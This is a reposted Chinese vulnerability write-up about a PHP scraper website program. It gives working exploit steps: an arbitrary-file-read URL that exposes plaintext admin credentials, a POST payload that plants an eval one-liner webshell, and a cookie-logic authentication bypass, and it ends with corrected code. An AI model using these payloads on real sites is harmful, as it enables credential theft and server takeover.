来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 打算用小偷程序做一个网站的就下载了一套程序结果就悲剧了下载地址:http://www.2cto.com/ym/201203/31432.html1、前台任意文件读取漏洞:img.php文件代码?php$p=$_GET[#39;p#39;];$pics=file($p);for($i=0;$...
打算用小偷程序做一个网站的就下载了一套程序结果就悲剧了
下载地址:http://www.2cto.com/ym/201203/31432.html 1、前台任意文件读取漏洞: img.php文件代码 <?php $p=$_GET['p']; $pics=file($p); for($i=0;$i< count($pics);$i++) { echo $pics[$i]; } ?> 典型任意文件读取没有任何验证 利用方法:/img.php?p=./admin/data.php 读取管理员帐号密码 明文的哦 2、后台任意代码写入: admin_ad.php 最后一段代码 <? }elseif ($_GET['action']=="add"){ //echo $_POST['js_mb']; $file="../ad/".$_POST['js_file']; $fp=fopen($file,"w"); fwrite($fp,stripslashes($_POST['js_mb'])); fclose($fp); echo"<script>alert('修改成功!');location.href='?id=ad';</script>"; } ?> 利用 发送POST数据 path:/admin/admin_ad.php?action=add POST数据包:js_file=x.php&js_mb=<?php eval($_POST[cmd]);?> 既可在网站ad 目录下生成一个x.php的一句话木马 密码cmd 该文件头部,验证不足: <? include('data.php'); if($_COOKIE['x_Cookie']!=$adminname and $_COOKIE['y_Cookie']!=$password){ echo"<script>location.href='index.php';</script>"; exit; } ?> 逻辑错误知道其一即可绕过 www.2cto.com 转自:http://www.90sec.org/thread-1704-1-1.html,内容有修改。 后台的权限验证问题,设置Cookie:x_Cookie=用户名 或y_Cookie 等于密码即可通过验证 if($_COOKIE['x_Cookie']!=$adminname and $_COOKIE['y_Cookie']!=$password){ 这个逻辑漏洞很狗血,作者一定是蛋爆了才会这么写…… 正确的应该为: if($_COOKIE['x_Cookie']!=$adminname or $_COOKIE['y_Cookie']!=$password){ 或者: if($_COOKIE['x_Cookie']==$adminname and $_COOKIE['y_Cookie']==$password){ 作者 Nuclear'Atk 网络安全研究中心 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com